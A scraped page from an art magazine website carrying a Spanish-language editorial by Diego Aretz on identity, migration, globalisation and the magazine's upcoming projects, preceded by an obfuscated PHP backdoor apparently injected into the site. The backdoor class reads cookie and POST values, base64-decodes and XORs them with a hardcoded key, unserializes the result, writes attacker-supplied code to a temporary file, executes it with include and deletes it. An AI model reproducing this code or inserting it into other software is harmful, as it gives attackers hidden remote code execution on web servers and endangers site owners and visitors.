$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> A la deriva. – www.interferencechannel.com

A la deriva.

Editor

Estamos a la deriva, todas las historias nos pertenecen y al mismo tiempo ninguna es nuestra. Esta es la situación a la que un medio como Interference se enfrenta.

En esta editorial quisimos hablar de identidad, frontera y otredad, preguntas que resultan vigentes y cotidianas en el mundo que vivimos, hoy en día en que los flujos migratorios son de una alta complejidad; las rutas ya no son de países latinoamericanos, asiáticos o africanos a países europeos, vemos cada vez más una afluencia de europeos y norteamericanos a otras latitudes. Entre nosotros ha surgido también un interés por lo cercano, por países que están más cerca de nosotros en su geografía y en su sociedad, países con los que compartimos una lengua y muchos pasados.

Una de nuestras preguntas es cuál va a ser el devenir nuestro y de nuestra cultura en un mundo así, donde el flujo de información es tan absurdo, donde el recuerdo del ayer queda ahogado por la actualidad vana del hoy…donde es más importante estar bien informado que poder reflexionar esa información, donde nos es cada vez más difícil encontrar y reconocer lo que fuimos.

Una globalización conducida por un liberalismo económico ciego y un “progreso” univoco parecen condenarnos a la desaparición como cultura. ¿Cuáles son las resistencias que debemos oponer?

Debemos hoy más que nunca ser conscientes de lo que tenemos,  lo que podemos salvar, lo que hay que proteger. No solo son los recursos naturales, hay también infinidad de recursos culturales que nos pertenecen, que son legado de siglos y que no podemos perder.

Todos estos temas decidimos tocarlos en esta editorial; invitamos al curador Emilio Tarazona a escoger la portada, una obra de la artista peruana Nicole Cuglievan, invitamos también artistas que han sido portadas nuestras como Elisa Pritzker, Matteo Prezioso o Camilo Bojaca. Elisa nos trae un relato visual “selknam-series” de los Selknam, un grupo indígena del sur de Argentina y Chile, actualmente extinto, Camilo nos trae un relato de la urbe “Andamios” un análisis del espacio y las condiciones a que nos redujimos en las ciudades contemporáneas, Matteo nos habla de una ciudad, sus lecturas y sus habitantes. Para esta editorial Ivan Ordoñez traduce a Lars Bang Larsen; una mirada sociológica a la figura del Zombi desde diferentes lecturas, Felipe Cáceres nos habla de los procesos de cambio auténticos después de la De-colonia, Enrique Velasco desde México nos cuestiona sobre “el otro” en la cultura occidental, José Ramón Briceño nos trae una crónica del estado  Aragua en Venezuela.

Quería hablar también de la feria Arco en la que Colombia fue invitada especial, una gran oportunidad no solo para los artistas y galerías  sino para las ideas y el intercambio cultural. Fomentar diálogos es quizás una de las tareas más importantes en el mundo contemporáneo, debemos comenzar a preguntarnos por el rol que vamos a tener en la región y en el mundo al cerrar nuestro capitulo de la guerra.

Marzo es un mes especial para nosotros, inauguramos el centro de pensamiento “Interference Tank” y estamos desarrollando el primer proyecto llamado  “Gentrifornication” que se enfoca en la gentrificación en Bogotá. Para este proyecto cinco espacios nos abrieron sus puertas: Flora Ars+Natura, Galería Valenzuela Klenner, Miami, Galería Christopher Paschall y El Parche Artist Residency. A todos ellos agradecemos su apoyo.

Quiero agradecer también a nuestros lectores por haber estado conectados y a todos los que hacen Interference posible. Seguimos compartiendo, seguimos conectando y seguimos creyendo.♦

Diego Aretz

Editor Interference Channel

Comments are closed.